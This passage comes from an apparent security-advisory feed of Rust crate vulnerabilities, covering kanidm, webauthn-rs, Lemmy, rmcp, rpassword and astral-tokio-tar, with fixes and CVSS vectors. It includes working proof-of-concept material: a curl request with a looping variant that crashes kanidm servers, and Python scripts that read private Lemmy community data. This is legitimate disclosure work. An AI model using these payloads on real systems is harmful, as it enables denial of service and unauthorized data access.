`max_buf_size` (~400 KiB) is not lowered (`server/core/src/https/mod.rs:708-727`), so a 12 KB URI is accepted. An identical unbounded grammar exists in `libs/scim_proto/src/filter.rs:112-276` (not network-reachable, but should be fixed in the same patch). ### PoC ```sh curl -sk "https://idm.example.com/scim/v1/Application?filter=$(python3 -c 'print("("*3000+"a+pr"+")"*3000)')" # → curl: (52) Empty reply from server # → server journal: "fatal runtime error: stack overflow, aborting", SIGABRT ``` Release-build threshold measured at ~2 000 nesting levels / ~4 KB: ``` $ cargo test --release -p kanidm_proto --test scim_filter_depth -- --nocapture parens depth=1500 len=3004 -> survived parens depth=2000 len=4004 thread 'audit_scim_filter_nested_parens' has overflowed its stack fatal runtime error: stack overflow, aborting (signal: 6, SIGABRT: process abort signal) ``` End-to-end against an in-process server via `kanidmd_testkit` (no authentication performed): ``` Testkit server setup complete - http://localhost:18080/ audit_scim_dos: sending unauthenticated GET, url len = 12056 thread '...' has overflowed its stack fatal runtime error: stack overflow, aborting (signal: 6, SIGABRT: process abort signal) ``` ### Impact Process-wide availability loss; no confidentiality or integrity impact. - **Unauthenticated**, default install, no feature flag required. - **Process abort, not task panic.** Stack overflow triggers libstd's guard-page handler, which calls `std::process::abort()`. tokio's per-task `catch_unwind` isolation does not apply to aborts. All in-flight HTTP requests, OAuth2/OIDC sessions, LDAP binds, and the web UI are terminated. - **Repeatable.** One ~12 KB GET per crash; a `while true; do curl ...; done` loop holds the service down indefinitely across supervisor restarts. - The 6 011-byte variant (`depth=3000`) fits under the nginx default `large_client_header_buffers` limit of 8 KB, so a typical reverse proxy does not mitigate. **Affected**: v1.7.0 through `master` @ edf50b9da.

الإصدارات المتأثرة

All versions < 1.9.3

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

منخفضة
📦 kanidm 📌 All versions < 1.9.3 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The kanidmd OAuth2 token-exchange (`/oauth2/token`) and token-introspection (`/oauth2/token/introspect`) endpoints compare the supplied `client_secret` against the stored secret using Rust's `PartialEq` on `String`, which short-circuits on the first mismatching byte....
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary The kanidmd OAuth2 token-exchange (`/oauth2/token`) and token-introspection (`/oauth2/token/introspect`) endpoints compare the supplied `client_secret` against the stored secret using Rust's `PartialEq` on `String`, which short-circuits on the first mismatching byte. This produces an observable timing discrepancy that varies with the length of the matching prefix. ### Details - https://github.com/kanidm/kanidm/blob/master/server/lib/src/idm/oauth2.rs#L1135 — variable-time comparison in `check_oauth2_token_exchange` - https://cwe.mitre.org/data/definitions/208.html — CWE-208: Observable Timing Discrepancy ### PoC Static analysis only — no timing-recovery script was run because remote recovery of a 48-byte high-entropy secret over HTTPS is not practically demonstrable. The variable-time behaviour is established by inspection: ```rust // server/lib/src/idm/oauth2.rs:1135 (check_oauth2_token_exchange) if authz_secret == &secret { … } else { return Err(Oauth2Error::AuthenticationRequired); } ``` `String: PartialEq` delegates to `<[u8] as PartialEq>::eq`, which checks length equality then iterates byte-by-byte and returns on the first difference. ### Impact An unauthenticated network attacker who can reach the OAuth2 endpoints can submit arbitrary `client_id`/`client_secret` pairs and observe response latency. In principle the early-exit comparison leaks the position of the first mismatching byte, providing a timing oracle toward incremental recovery of a confidential client's secret. In practice the stored secret is a server-generated 48-character high-entropy string, the comparison runs inside an async tokio handler behind TLS, and network jitter is orders of magnitude larger than a single byte-compare — so remote recovery is not considered realistic with current techniques. This is a hardening issue rather than a practically exploitable vulnerability. ### Affected versions All published `kanidmd_lib` releases; the comparison is still variable-time on `master` at 1.10.0-dev

الإصدارات المتأثرة

All versions < 1.9.3

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N

غير محدد
📦 kanidm 📌 All versions < 1.9.3 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary The kanidmd web UI renders the WebAuthn passkey-registration challenge as raw JSON inside an inline `<script id="data">` element using the Askama `|safe` filter. The challenge embeds the account's `displayname`, which `serde_json` serialises without escaping `<`/`>`....
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary The kanidmd web UI renders the WebAuthn passkey-registration challenge as raw JSON inside an inline `<script id="data">` element using the Askama `|safe` filter. The challenge embeds the account's `displayname`, which `serde_json` serialises without escaping `<`/`>`. A `displayname` containing `</script>` therefore terminates the script element early and injects arbitrary HTML into the credential-update page. Because the page is htmx-driven and the server's CSP allows `'unsafe-eval'`, injected `hx-*` attributes can issue authenticated same-origin API requests with the viewer's bearer cookie. ### Impact An authenticated attacker who is a member of `idm_people_admins` can write the `displayname` of any `Person` entry — including high-privilege persons — because `idm_acp_people_pii_manage` carries no high-privilege exclusion filter. When the targeted high-privilege user later opens **Add Passkey** on their own credential-update page (`/ui/reset`), the injected markup is swapped into the DOM and htmx fires attacker-chosen same-origin requests authenticated as the victim. This allows a helpdesk-tier operator to escalate to `idm_admins` (e.g. by POSTing themselves into the group) or otherwise act with the victim's session. The self-write path (`idm_people_self_name_write`) is self-XSS only and is not counted toward impact. Even without the htmx vector, the breakout permits `<meta http-equiv='refresh'>` open-redirect and arbitrary defacement of the credential page. ### Details - https://github.com/kanidm/kanidm/blob/master/server/core/templates/credential_update_add_passkey_partial.html#L3 — the `|safe` sink - https://github.com/kanidm/kanidm/blob/master/server/core/src/https/views/reset.rs#L506-L509 — `serde_json::to_string` of the challenge - https://github.com/kanidm/kanidm/blob/master/server/lib/src/idm/credupdatesession.rs#L2453-L2460 — `displayname` flows into `start_passkey_registration` ### Affected versions All releases shipping the htmx credential-update views

الإصدارات المتأثرة

All versions < 1.9.3

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

منخفضة
📦 webauthn-rs-core 📌 All versions < 0.5.5 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary `webauthn-rs-core` ([Relying Party][rp]) and `webauthn-authenticator-rs` ([client][]) checked that [an `Origin` in `CollectedClientData`][origin] is valid for [an RP ID][rpid] with [`str::ends_with()`][ends-with], [without checking for a dot (`.`) before the RP ID wh...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Summary `webauthn-rs-core` ([Relying Party][rp]) and `webauthn-authenticator-rs` ([client][]) checked that [an `Origin` in `CollectedClientData`][origin] is valid for [an RP ID][rpid] with [`str::ends_with()`][ends-with], [without checking for a dot (`.`) before the RP ID when allowing subdomains][registerable-suffix]. This check is flawed, and could allow requests from an attacker-controlled domain such as `hermit-crab.example` to be accepted for the RP ID `crab.example` (assuming `.example` was publicly-registerable TLD) when the RP allows authenticating from a subdomain (disabled by default in `webauthn-rs-core` and `webauthn-rs`). [registerable-suffix]: https://html.spec.whatwg.org/multipage/browsers.html#is-a-registrable-domain-suffix-of-or-is-equal-to [ends-with]: https://doc.rust-lang.org/stable/std/primitive.str.html#method.ends_with [client]: https://www.w3.org/TR/webauthn-3/#client [rp]: https://www.w3.org/TR/webauthn-3/#relying-party [rpid]: https://www.w3.org/TR/webauthn-3/#rp-id [origin]: https://www.w3.org/TR/webauthn-3/#dom-collectedclientdata-origin * In `webauthn-rs-core`, this **only** applies when: * [`WebauthnCore::allow_subdomains_origin`](https://docs.rs/webauthn-rs-core/0.5.4/webauthn_rs_core/struct.WebauthnCore.html#method.new_unsafe_experts_only) is `true` (the default is `false`), *and* * the attacker could register a domain that ends with the RP ID as a raw string, *and*, * the client does not implement these checks correctly either `webauthn-rs` can set `allow_subdomains_origin` via [`WebauthnBuilder::allow_subdomains`](https://docs.rs/webauthn-rs/0.5.4/webauthn_rs/struct.WebauthnBuilder.html#method.allow_subdomains). Fixing the bug in `webauthn-rs-core` also fixes it in `webauthn-rs`. * In `webauthn-authenticator-rs`, the flawed check is in [`WebauthnAuthenticator::do_registration()`](https://docs.rs/webauthn-authenticator-rs/0.5.4/webauthn_authenticator_rs/struct.WebauthnAuthenticator.html#method.do_registration) and [`do_authentication()`](https://docs.rs/webauthn-authenticator-rs/0.5.4/webauthn_authenticator_rs/struct.WebauthnAuthenticator.html#method.do_registration). A conforming [Relying Party][rp] implementation would reject such requests, but `webauthn-rs-core` did not. An application can still provide an incorrect `origin` parameter to `webauthn-authenticator-rs`, or use lower-level APIs that bypass these checks entirely, and this is by design. These issues are a violation of [WebAuthn Level 3 §13.4.9](https://www.w3.org/TR/webauthn-3/#sctn-validating-origin), [§5.1.3 Step 8](https://www.w3.org/TR/webauthn-3/#CreateCred-DetermineRpId) and [§5.1.4.1 Step 7](https://www.w3.org/TR/webauthn-3/#GetAssn-DetermineRpId). ### Details * `webauthn-rs-core/src/core.rs` line 1213: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-rs-core/src/core.rs#L1211-L1216 * `webauthn-authenticator-rs/src/lib.rs` line 274: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-authenticator-rs/src/lib.rs#L274-L277 * `webauthn-authenticator-rs/src/lib.rs` line 335: https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-authenticator-rs/src/lib.rs#L335-L338 [`str::ends_with()`][ends-with] performs a raw string suffix match _without_ [enforcing a domain label boundary][registerable-suffix]: Origin | RP ID | Expected result | Result with incorrect `ends_with` check -- | -- | -- | -- `hermit-crab.example` | `crab.example` | rejected | accepted **(bug!)** `auth.crab.example` | `crab.example` | accepted | accepted (subdomain) `crab.example` | `crab.example` | accepted | accepted (exact match) `hermit-crab.example` | `auth.crab.example` | rejected | rejected `auth.crab.example` | `auth.crab.example` | accepted | accepted (exact match) ### Fix When `webauthn-rs-core` v0.5.5 checks if an `Origin` is a valid subdomain of an RP ID, it will check that it ends with the RP ID prefixed with a dot (`.{rp_id}`). `webauthn-rs` v0.5.5 will be fixed by depending on `webauthn-rs-core` v0.5.5. `webauthn-authenticator-rs` v0.5.5 now uses `webauthn-rs-core`'s checks in `WebauthnAuthenticator`. Regression tests for this bug have been added to both libraries. ### Impact With a **both** a non-conforming [client][] implementation and vulnerable version of `webauthn-rs-core` configured to allow subdomains (not the default), this bug would allow an attacker at `hermit-crab.example` to phish a target's credential for the RP ID `crab.example` by directly proxying a legitimate `navigator.credentials.get()` request on the attacker's domain. However, _conforming_ [client implementations][client] (ie: all web browsers) will refuse to process WebAuthn requests for an RP ID that does not match the `Origin` of the current page and is not [a related `Origin`](https://www.w3.org/TR/webauthn-3/#sctn-related-origins). In the scenario above with _conforming_ client-side checks, this would force the attacker to change the request's RP ID to `hermit-crab.example` (the attacker's `Origin`). This would also change the RP ID hash, [and `webauthn-rs-core` would reject it](https://github.com/kanidm/webauthn-rs/blob/197cddf8487a2dbdd5d374e50d80aa1e4682f3ab/webauthn-rs-core/src/core.rs#L825-L840) (per [WebAuthn §7.2 Step 15](https://www.w3.org/TR/webauthn-3/#rp-op-verifying-assertion-step-rpid-hash)). ### Severity Per [WebAuthn §13.4.9](https://www.w3.org/TR/webauthn-3/#sctn-validating-origin): > The [Relying Party](https://www.w3.org/TR/webauthn-3/#relying-party) MUST NOT accept unexpected values of [origin](https://www.w3.org/TR/webauthn-3/#dom-collectedclientdata-origin), as doing so could allow a malicious website to obtain valid [credentials](https://www.w3.org/TR/credential-management-1/#concept-credential). Although the [scope](https://www.w3.org/TR/webauthn-3/#scope) of WebAuthn credentials prevents their use on domains outside the [RP ID](https://www.w3.org/TR/webauthn-3/#rp-id) they were registered for, the [Relying Party](https://www.w3.org/TR/webauthn-3/#relying-party)’s origin validation serves as an additional layer of protection in case a faulty [authenticator](https://www.w3.org/TR/webauthn-3/#authenticator) fails to enforce credential [scope](https://www.w3.org/TR/webauthn-3/#scope). Unfortunately, [the chain needed to exploit this bug makes it difficult to classify with the CVSS framework](https://www.first.org/cvss/v4.0/user-guide#Vulnerability-Chaining). Kanidm came up with anywhere between "low" and "high" depending on the approach, and GitHub only provides one CVSS field for everything. An attacker could easily bypass a _correctly-implemented_ server-side `Origin` check, if they can convince a target to use their authenticator with [an attacker-controlled client device](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-t-1.3.2) or [buggy/malicious client application](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-t-1.3.1). FIDO's Security Reference [assumes that "the FIDO user device and applications involved in a FIDO operation are trustworthy agents of the user"](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#dfn-sa-4), and violating that [limits the protections FIDO can provide](https://fidoalliance.org/specs/common-specs/fido-security-ref-v2.1-ps-20220523.html#discussion), so it would be ridiculous to describe those bypasses as a "high" severity vulnerability. However, `webauthn-rs-core` should take reasonable steps to prevent these sorts of issues where it can, especially when they're part of the WebAuthn specification. Due to the complex preconditions and non-default configuration required to execute a successful attack, and that it is *not exploitable* in popular web browsers, Kanidm considers this a **low severity** issue.

الإصدارات المتأثرة

All versions < 0.5.5

CVSS Vector

CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

غير محدد
📦 lemmy_api 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل
💬 ## Summary Lemmy applies private-community checks in `PostView` and `CommentView`, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community `sidebar` and `summary` fields. Alice, a former...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary Lemmy applies private-community checks in `PostView` and `CommentView`, but several adjacent API views skip the accepted-follower filter. Bob, a registered user who is not an accepted follower, can read private community `sidebar` and `summary` fields. Alice, a former accepted follower, can still read saved and liked private post bodies after she leaves. An unauthenticated visitor can read private community metadata and removed private post names through the modlog. ## Details `CommunityView::read()` and `CommunityQuery::list()` call `visible_communities_only()`, but they do not add the private-community filter used by post and comment reads: ```rust query = my_local_user.visible_communities_only(query); query.first(conn).await.with_lemmy_type(LemmyErrorType::NotFound) ``` `PersonSavedCombinedQuery::list()` and `PersonLikedCombinedQuery::list()` join `community_actions`, but they only filter by the requesting person id. They do not require `community_actions.follow_state = Accepted` when the community has `visibility = Private`. The modlog query returns `ListingType::All` without a visibility predicate: ```rust query = match self.listing_type.unwrap_or(ListingType::All) { ListingType::All => query, ``` The control paths show the expected check. `PostView::read()` and `CommentView::read()` both filter private communities to accepted followers: ```rust community::visibility .ne(CommunityVisibility::Private) .or(community_actions::follow_state.eq(CommunityFollowerState::Accepted)) ``` ## Proof of Concept The following script reproduces the leak against a fresh Lemmy instance. Tested against `dessalines/lemmy:nightly` with the default setup account from the sample config. The script opens registration so it can create Alice and Bob. ```python import requests, random, string BASE = "http://127.0.0.1:8536/api/v4" # change to the target Lemmy URL ADMIN_USER = "lemmy" ADMIN_PASS = "lemmylemmy" PASSWORD = "Password123456!" def req(method, path, token=None, params=None, **body): headers = {} if token: headers["Authorization"] = "Bearer " + token return requests.request(method, BASE + path, headers=headers, params=params, json=body or None) def register(name): r = req("POST", "/account/auth/register", username=name, password=PASSWORD, password_verify=PASSWORD, email=name + "@example.test") r.raise_for_status() token = r.json()["jwt"] person_id = req("GET", "/account", token).json()["local_user_view"]["person"]["id"] return token, person_id def show(label, response, marker): text = response.text print("\n" + label + ": HTTP", response.status_code) print(text[:700]) print("contains marker:", marker in text) suffix = "poc" + "".join(random.choice(string.ascii_lowercase) for _ in range(6)) admin = req("POST", "/account/auth/login", username_or_email=ADMIN_USER, password=ADMIN_PASS).json()["jwt"] req("PUT", "/site", admin, registration_mode="open", email_verification_required=False) alice, alice_id = register("alice" + suffix) bob, _ = register("bob" + suffix) secret = "SECRET_" + suffix community = req("POST", "/community", admin, name="priv" + suffix, title="Private Proof " + suffix, sidebar=secret + " sidebar", summary=secret + " summary", visibility="private").json()["community_view"]["community"] community_id = community["id"] post = req("POST", "/post", admin, name="secret post " + suffix, community_id=community_id, body=secret + " post body").json()["post_view"]["post"] post_id = post["id"] show("Bob reads private community metadata", req("GET", "/community", bob, params={"id": community_id}), secret) show("Bob direct post read control", req("GET", "/post", bob, params={"id": post_id}), secret) req("POST", "/community/follow", alice, community_id=community_id, follow=True) req("POST", "/community/pending_follows/approve", admin, community_id=community_id, follower_id=alice_id, approve=True) req("PUT", "/post/save", alice, post_id=post_id, save=True) req("POST", "/post/like", alice, post_id=post_id, is_upvote=True) req("POST", "/community/follow", alice, community_id=community_id, follow=False) show("Alice direct post read after leaving", req("GET", "/post", alice, params={"id": post_id}), secret) show("Alice saved list after leaving", req("GET", "/account/saved", alice), secret) show("Alice liked list after leaving", req("GET", "/account/liked", alice), secret) mod_comm = req("POST", "/community", admin, name="modlog" + suffix, title="Private Modlog " + suffix, sidebar=secret + " modlog sidebar", summary=secret + " modlog summary", visibility="private").json()["community_view"]["community"] mod_post = req("POST", "/post", admin, name=secret + " removed post", community_id=mod_comm["id"], body="body").json()["post_view"]["post"] req("POST", "/post/remove", admin, post_id=mod_post["id"], removed=True, reason="poc") show("Unauthenticated modlog", req("GET", "/modlog", params={"listing_type": "all", "limit": 50}), secret) ``` Output: ```text Bob reads private community metadata: HTTP 200 contains marker: True Bob direct post read control: HTTP 404 contains marker: False Alice direct post read after leaving: HTTP 404 contains marker: False Alice saved list after leaving: HTTP 200 contains marker: True Alice liked list after leaving: HTTP 200 contains marker: True Unauthenticated modlog: HTTP 200 contains marker: True ``` ## Impact Bob can read private community descriptions and sidebars before a moderator approves him. Alice can leave a private community, or a moderator can remove her, and Lemmy still returns private post bodies that Alice saved or liked while she was a member. An unauthenticated visitor can use the public modlog to discover private community metadata and removed private post names. ## Recommended Fix Apply the same private-community filter used by `PostView` and `CommentView` to `CommunityView::read()`, `CommunityQuery::list()`, `PersonSavedCombinedQuery::list()`, `PersonLikedCombinedQuery::list()`, and the `ListingType::All` branch of the modlog query. Admins and accepted followers should keep access. Other callers should receive the same `404` behavior as `GET /post` and `GET /comment`. --- *Found by [aisafe.io](https://aisafe.io)*

الإصدارات المتأثرة

All versions < 0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

غير محدد
📦 lemmy_api 📌 All versions < 0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل
💬 ## Summary `read_multi_community()` does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists. ## Details Other read handlers load `...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary `read_multi_community()` does not enforce the private-instance setting. On a private instance, an unauthenticated visitor can read multi-community names, titles, summaries, sidebars, owner identities, and member community lists. ## Details Other read handlers load `local_site` and call `check_private_instance()` before returning data to unauthenticated callers. `read_multi_community()` does not call that helper: ```rust pub async fn read_multi_community( Query(data): Query<GetMultiCommunity>, context: Data<LemmyContext>, local_user_view: Option<LocalUserView>, ) -> LemmyResult<Json<GetMultiCommunityResponse>> { let my_person_id = local_user_view.as_ref().map(|l| l.person.id); let id = resolve_multi_community_identifier(&data.name, data.id, &context, &local_user_view) .await? .ok_or(LemmyErrorType::NoIdGiven)?; let multi_community_view = MultiCommunityView::read(&mut context.pool(), id, my_person_id).await?; ``` `get_community()`, `list_posts()`, `list_comments()`, `read_person()`, `search()`, and `resolve_object()` all enforce the private-instance guard. ## Proof of Concept The script creates a multi-community whose metadata contains a marker, turns on `private_instance`, confirms a guarded control endpoint blocks unauthenticated callers, then reads the same multi-community over `GET /multi_community` without authentication. ```python #!/usr/bin/env python3 import json, random, string import requests BASE = "http://127.0.0.1:8536/api/v4" ADMIN_USER = "lemmy" ADMIN_PASS = "lemmylemmy" def api(method, path, token=None, **kw): h = kw.pop("headers", {}) if token: h["Authorization"] = "Bearer " + token return requests.request(method, BASE + path, headers=h, **kw) suffix = "multi" + "".join(random.choice(string.ascii_lowercase) for _ in range(6)) secret = "SECRET_MULTI_" + suffix admin = api("POST", "/account/auth/login", json={"username_or_email": ADMIN_USER, "password": ADMIN_PASS}).json()["jwt"] # Create a multi-community whose title/summary/sidebar embed the marker. mid = api("POST", "/multi_community", admin, json={ "name": "m" + suffix, "title": secret, "summary": secret + " summary", "sidebar": secret + " sidebar", }).json()["multi_community_view"]["multi"]["id"] # Enable private_instance. api("PUT", "/site", admin, json={"private_instance": True}) print("private_instance:", api("GET", "/site").json()["site_view"]["local_site"]["private_instance"]) # Control: a comparable read endpoint correctly rejects unauthenticated callers. control = api("GET", "/community/list") print("unauth /community/list (control):", control.status_code, control.text[:120]) # Leak: read_multi_community returns the private metadata to an unauthenticated caller. leak = api("GET", "/multi_community", params={"id": mid}) print("unauth /multi_community:", leak.status_code, leak.text[:300]) print("contains secret:", secret in leak.text) ``` Output: ```text private_instance: True unauth /community/list (control): 400 {"error":"instance_is_private","cause":"InstanceIsPrivate"} unauth /multi_community: 200 {"multi_community_view":{"multi":{"title":"SECRET_MULTI_multijwxokm","summary":"SECRET_MULTI_multijwxokm summary","sidebar":"SECRET_MULTI_multijwxokm sidebar"}}} contains secret: True ``` The control request shows the privacy setting is active. The multi-community endpoint still returns the private metadata. ## Impact An unauthenticated visitor can read multi-community metadata from an instance whose admin configured the site as private. The exposed fields include names, titles, summaries, sidebars, owner identities, and member community lists. ## Recommended Fix Load `local_site` at the start of `read_multi_community()` and call `check_private_instance(&local_user_view, &local_site)?` before resolving or reading the multi-community. --- *Found by [aisafe.io](https://aisafe.io)*

الإصدارات المتأثرة

All versions < 0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

عالية
📦 rmcp 📌 All versions < 1.4.0 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ## Summary Prior to version 1.4.0, the `rmcp` crate's Streamable HTTP server transport (`crates/rmcp/src/transport/streamable_http_server/`) did not validate the incoming `Host` header. This allowed a malicious public website, via a DNS rebinding attack, to send authenticated re...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

## Summary Prior to version 1.4.0, the `rmcp` crate's Streamable HTTP server transport (`crates/rmcp/src/transport/streamable_http_server/`) did not validate the incoming `Host` header. This allowed a malicious public website, via a DNS rebinding attack, to send authenticated requests to an MCP server running on the victim's loopback or private-network interface — violating the MCP specification's [transport security guidance](https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning). ## Impact An attacker who convinces a victim to visit a malicious page can: - Enumerate and invoke any tool exposed by a locally-running rmcp-based MCP server. - Read resources, prompts, and any state accessible via the MCP session. - Trigger side effects (file writes, shell execution, API calls, etc.) limited only by what tools the victim's server exposes. Because MCP servers frequently run with the user's privileges and expose developer tooling (filesystems, shells, browser control, language servers, etc.), the practical impact can extend to arbitrary code execution on the victim's machine. ## Affected Versions `rmcp < 1.4.0` — all prior releases of the Streamable HTTP server transport. Non-HTTP transports (stdio, child-process) are not affected. ## Patched Versions `rmcp >= 1.4.0` (current: 1.5.1). ## Patch Fixed in [PR #764](https://github.com/modelcontextprotocol/rust-sdk/pull/764) (commit `8e22aa2`), released as v1.4.0 on 2026-04-09: - `StreamableHttpServerConfig::allowed_hosts` now defaults to a loopback-only allowlist: `["localhost", "127.0.0.1", "::1"]`. - All incoming HTTP requests pass through `validate_dns_rebinding_headers()`, which parses the `Host` header and returns HTTP 403 if the host is not on the allowlist. - Public deployments can configure an explicit allowlist via `StreamableHttpService::with_allowed_hosts(...)`, or opt out (not recommended without an upstream reverse proxy that validates `Host`) via `disable_allowed_hosts()`. This fix validates the `Host` header only. `Origin` header validation is tracked as a defense-in-depth follow-up in [#822](https://github.com/modelcontextprotocol/rust-sdk/issues/822) and is not required to block the DNS rebinding attack described here — the browser cannot forge the Host header sent to the rebound server. ## Workarounds for Unpatched Users - Upgrade to `rmcp >= 1.4.0`. - If upgrade is not possible, place the MCP server behind a reverse proxy (e.g. nginx, Caddy) configured to reject requests whose `Host` header is not one of your expected hostnames. - Do not bind the MCP server to `0.0.0.0` without such a proxy. ## Resources - PR: https://github.com/modelcontextprotocol/rust-sdk/pull/764 - Issue: https://github.com/modelcontextprotocol/rust-sdk/issues/815 - Follow-up (Origin validation): https://github.com/modelcontextprotocol/rust-sdk/issues/822 - MCP transport security guidance: https://modelcontextprotocol.io/specification/2025-06-18/basic/transports#security-warning ## Related advisories (same class of vulnerability) - TypeScript SDK: GHSA-w48q-cv73-mx4w - Python SDK: GHSA-9h52-p55h-vw2f - Go SDK: GHSA-xw59-hvm2-8pj6 - Java SDK: GHSA-8jxr-pr72-r468

الإصدارات المتأثرة

All versions < 1.4.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

منخفضة
📦 rpassword 📌 All versions < 7.5.0 📄 مكتبي 🦀 مكتبة Rust crates.io 🎯 فيزيائي ⚪ لم تُستغل 🟢 ترقيع
💬 rpassword maintainers were made aware of a possible issue with a partial password reveal when input is interrupted. To quote @squell: > @conradkleinespel I've confirmed this problem with SequoiaPGP, which I think uses rpassword, e.g.: > > Suppose we use pkill -9 sq in a differe...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

rpassword maintainers were made aware of a possible issue with a partial password reveal when input is interrupted. To quote @squell: > @conradkleinespel I've confirmed this problem with SequoiaPGP, which I think uses rpassword, e.g.: > > Suppose we use pkill -9 sq in a different terminal right after the password has been typed in: > > $ sq key generate --userid "barf" --with-password > Enter password to protect the key: Killed > $ hello^C > > Where the password I typed in is "hello". This has been fixed in version v7.5.0 and above.

الإصدارات المتأثرة

All versions < 7.5.0

CVSS Vector

CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:U/C:H/I:N/A:N

منخفضة
📦 astral-tokio-tar 📌 All versions < 0.6.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact In versions 0.6.0 and earlier of astral-tokio-tar, the `unpack_in` API could inadvertently modify the permissions of external (i.e. non-archive) directories outside of the archive. An attacker could use this to contrite a tar archive that maliciously changes directory...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact In versions 0.6.0 and earlier of astral-tokio-tar, the `unpack_in` API could inadvertently modify the permissions of external (i.e. non-archive) directories outside of the archive. An attacker could use this to contrite a tar archive that maliciously changes directory permissions outside of its intended hierarchy. This flaw only affects directories; individual file permissions cannot be modified via it. See GHSA-j4xf-2g29-59ph for the equivalent flaw in the `tar` crate. ### Patches Versions 0.6.1 and newer of astral-tokio-tar use `fs::symlink_metdata` rather than `fs::metadata`, avoiding the traversal. ### Workarounds Users are advised to upgrade to version 0.6.1 or newer to address this advisory. Users should experience no breaking changes as a result of the patch above. ### Resources - GHSA-j4xf-2g29-59ph for the original `tar` vulnerability ### Attribution - Reporter: Adam Harvey (@lawngnome)

الإصدارات المتأثرة

All versions < 0.6.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U

غير محدد
📦 astral-tokio-tar 📌 All versions < 0.6.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Impact Versions of astral-tokio-tar prior to 0.6.1 contain a PAX header interpretation bug that allows manipulated entries to be made selectively visible or invisible during extraction with astral-tokio-tar versus other tar implementations. An attacker could use this differe...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

### Impact Versions of astral-tokio-tar prior to 0.6.1 contain a PAX header interpretation bug that allows manipulated entries to be made selectively visible or invisible during extraction with astral-tokio-tar versus other tar implementations. An attacker could use this differential to smuggle unexpected files onto a victim's filesystem. See GHSA-j5gw-2vrg-8fgx for a similar desynchronization bug in astral-tokio-tar. ### Patches Versions 0.6.1 and newer of astral-tokio-tar address this differential. ### Workarounds Users are advised to upgrade to version 0.6.1 or newer to address this advisory. There is no workaround other than upgrading. Users should experience no breaking changes as a result of the upgrade. ### Resources - GHSA-j5gw-2vrg-8fgx is a similar PAX desynchronization bug ### Attribution - Reporter: Adam Harvey (@lawngnome)

الإصدارات المتأثرة

All versions < 0.6.1

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U

غير محدد
📦 tauri 📌 2.0.0 → 2.11.1 ⛓️‍💥 هجوم سلسلة التوريد 🦀 مكتبة Rust crates.io 🎯 عن بعد ⚪ لم تُستغل 🟢 ترقيع
💬 ### Summary A flaw in Tauri's `is_local_url()` function causes it to incorrectly classify remote URLs as trusted local origins on Windows and Android. On these systems, Tauri maps custom URI scheme protocols to `http://<scheme>.localhost/` because those platforms' WebView impleme...
📅 2026-05-06 OSV/crates.io 🔗 التفاصيل

الوصف الكامل

